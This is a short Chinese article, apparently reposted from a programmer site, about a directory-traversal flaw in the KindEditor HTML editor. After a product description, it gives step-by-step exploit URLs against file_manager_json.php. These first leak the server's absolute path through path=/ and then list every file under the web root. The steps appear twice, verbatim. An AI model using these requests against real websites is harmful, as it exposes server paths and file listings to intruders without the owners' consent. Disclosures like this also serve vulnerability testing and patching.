Kindeditor遍历目录0DAY问题
程序员文章站
2022-03-06 18:33:09
KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器... 15-08-13...
kindeditor是一套开源的html可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容ie、firefox、chrome、safari、opera等主流浏览器。 kindeditor使用javascript编写,可以无缝的于java、.net、php、asp等程序接合。 kindeditor非常适合在cms、商城、论坛、博客、wiki、电子邮件等互联网应用上使用,2006年7月首次发布2.0以来,kindeditor依靠出色的用户体验和领先的技术不断扩大编辑器市场占有率,目前在国内已经成为最受欢迎的编辑器之一。
利用方法:
1.http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/
//path=/,爆出绝对路径d:\appserv\www\67cms\kindeditor\php\file_manager_json.php
2.http://localhost/67cms/kindeditor/php/file_manager_json.php?path=appserv/www/67cms/
//根据爆出的绝对路径,修改path的值为appserv/www/67cms/
这时将遍历d:/appserv/www/67cms/下的所有文件和文件名
利用方法:
1.http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/
//path=/,爆出绝对路径d:\appserv\www\67cms\kindeditor\php\file_manager_json.php
2.http://localhost/67cms/kindeditor/php/file_manager_json.php?path=appserv/www/67cms/
//根据爆出的绝对路径,修改path的值为appserv/www/67cms/
这时将遍历d:/appserv/www/67cms/下的所有文件和文件名